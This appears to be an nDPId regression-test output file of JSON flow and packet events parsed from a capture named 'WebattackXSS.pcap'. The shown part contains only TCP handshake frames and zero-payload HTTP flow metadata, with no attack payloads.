+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348095258,"flow_last_seen":1499348095258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348095258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1499348095258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kglAAD4GM8esEAABwKgKMoxGAFCLy6cdAAAAAKACchBpMwAAAgQFtAQCCAoBPTUUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":2,"flow_last_seen":1499348095258,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348095258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjEYHlr2li8unHqAScSCaZwAAAgQFtAQCCAoD5waIAT01FAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":3,"flow_last_seen":1499348095259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348095259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kgpAAD4GM86sEAABwKgKMoxGAFCLy6ceB5a9poAQAOU5bwAAAQEICgE9NRQD5waI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348096595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gtxAAD4GQvSsEAABwKgKMoxUAFDl8LS+AAAAAKACchAAEQAAAgQFtAQCCAoBPTZiAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":2,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjFQs5xqq5fC0v6AScSCtoQAAAgQFtAQCCAoD5wfWAT02YgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":3,"flow_last_seen":1499348096595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gt1AAD4GQvusEAABwKgKMoxUAFDl8LS\/LOcaq4AQAOVMqQAAAQEICgE9NmID5wfW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348099359,"flow_last_seen":1499348099359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1499348099359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tSBAAD4GELCsEAABwKgKMoxuAFCNr4w1AAAAAKACchB+DgAAAgQFtAQCCAoBPTkVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":2,"flow_last_seen":1499348099359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjG7WE+F5ja+MNqAScSC47wAAAgQFtAQCCAoD5wqJAT05FQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":3,"flow_last_seen":1499348099360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348099360,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tSFAAD4GELesEAABwKgKMoxuAFCNr4w21hPheoAQAOVX9wAAAQEICgE9ORUD5wqJ"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347967724,"flow_last_seen":1499347972889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347970267,"flow_last_seen":1499347975890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347971560,"flow_last_seen":1499347976891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347974113,"flow_last_seen":1499347979891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
